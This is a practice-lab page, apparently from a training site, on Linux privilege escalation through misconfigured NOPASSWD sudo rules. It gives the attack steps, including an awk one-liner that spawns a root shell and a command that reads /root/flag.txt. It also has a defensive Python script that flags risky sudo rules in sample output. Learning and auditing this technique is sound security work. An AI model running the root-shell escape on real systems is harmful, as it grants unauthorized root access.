sudo -l Privilege Escalation
A misconfigured sudo rule is one of the most common real-world Linux privesc paths. Drill it until `sudo -l` is the first thing your fingers type.
You start as an unprivileged user on a real Linux box in your browser. Run `sudo -l`, spot the NOPASSWD binary, and abuse it with the matching GTFOBins technique to execute as root and read the flag.
Every rep reseeds the box — a different binary (find, awk, env, python3, perl) and target each time — so you practice the recognition, not a memorized command. Solve it and a fresh variant spins up instantly.
How the attack works
- Enumerate what your user is allowed to run as another user.
  `sudo -l`
- Spot the NOPASSWD entry — a binary you can run as root without a password.
- Look the binary up on GTFOBins for its sudo escape, then execute it to drop a root shell.
  `sudo awk 'BEGIN {system("/bin/sh")}'`
- Confirm you are root and read the protected flag.
  `id && cat /root/flag.txt`
On PwnKata the binary, account, and paths change every rep — so you drill the recognition, not this exact command.
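The recognition step above can also be run from the administrator's side as an audit. This is an added example, not PwnKata's code: it parses `sudo -l` output and reports NOPASSWD rules that run the binaries named on this page (or `ALL`) as root. The sample output, the user `student`, the host `drillbox` and the function name `risky_rules` are constructed for illustration.

```python
import os
import re

# Binaries this page names as drill targets. Each can start other programs,
# so a NOPASSWD rule for one of them amounts to passwordless root.
SHELL_CAPABLE = {"find", "awk", "env", "python3", "perl"}

RULE = re.compile(r"^\s*\(([^)]*)\)\s*(.+)$")  # "(runas) TAG: cmd, cmd"
TAG = re.compile(r"^([A-Z_]+):\s*")            # NOPASSWD:, PASSWD:, SETENV:

# Constructed sample of `sudo -l` output (user and host names are made up).
SAMPLE = """\
Matching Defaults entries for student on drillbox:
    env_reset, mail_badpass

User student may run the following commands on drillbox:
    (root) NOPASSWD: /usr/bin/awk
    (root) /usr/bin/find
    (backup) NOPASSWD: /usr/bin/perl
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status nginx, /usr/bin/env
"""

def risky_rules(sudo_l_output):
    """Return (runas_user, command) pairs that need no password and yield root."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE.match(line)
        if not m:
            continue
        runas_user = m.group(1).split(":")[0].strip()  # "ALL : ALL" is user : group
        nopasswd = False
        # Assumption: no escaped commas ("\,") inside command arguments.
        for cmd in m.group(2).split(","):
            cmd = cmd.strip()
            # A tag applies to the command it precedes and to those after it.
            while (t := TAG.match(cmd)):
                if t.group(1) in ("NOPASSWD", "PASSWD"):
                    nopasswd = t.group(1) == "NOPASSWD"
                cmd = cmd[t.end():]
            if not cmd or not nopasswd or runas_user not in ("root", "ALL"):
                continue
            if cmd == "ALL" or os.path.basename(cmd.split()[0]) in SHELL_CAPABLE:
                findings.append((runas_user, cmd))
    return findings

if __name__ == "__main__":
    for runas, cmd in risky_rules(SAMPLE):
        print(f"review: NOPASSWD as {runas}: {cmd}")
```

Each finding is a rule to remove, put behind a password, or replace with a fixed wrapper script that takes no user-controlled arguments.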
Recover the flag at /root/flag.txt and submit it.